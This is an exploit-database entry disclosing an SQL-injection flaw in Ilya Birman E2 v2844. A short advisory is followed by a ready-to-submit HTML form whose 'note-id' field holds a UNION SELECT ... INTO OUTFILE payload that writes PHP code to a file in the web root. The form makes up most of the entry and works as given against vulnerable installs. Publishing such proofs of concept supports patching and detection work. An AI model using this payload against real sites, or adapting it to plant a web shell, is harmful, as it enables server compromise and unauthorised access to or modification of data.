Ilya Birman E2 – ‘/@actions/comment-process’ SQL Injection

  • 作者: High-Tech Bridge
    日期: 2014-07-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39267/
  • source: https://www.securityfocus.com/bid/68843/info
    
    Ilya Birman E2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
    
    An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
    E2 v2844 is vulnerable; other versions may also be affected. 
    
    <form action="http://www.example.com/@actions/comment-process" method="post" name="main">
    <input type="hidden" name="already-subscribed" value="">
    <input type="hidden" name="comment-id" value="new">
    <input type="hidden" name="elton-john" value="1">
    <input type="hidden" name="email" value="mail@mail.com">
    <input type="hidden" name="from" value="">
    <input type="hidden" name="name" value="name">
    <input type="hidden" name="subscribe" value="on">
    <input type="hidden" name="text" value="1">
    <input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
    <input type="submit" id="btn">
    </form>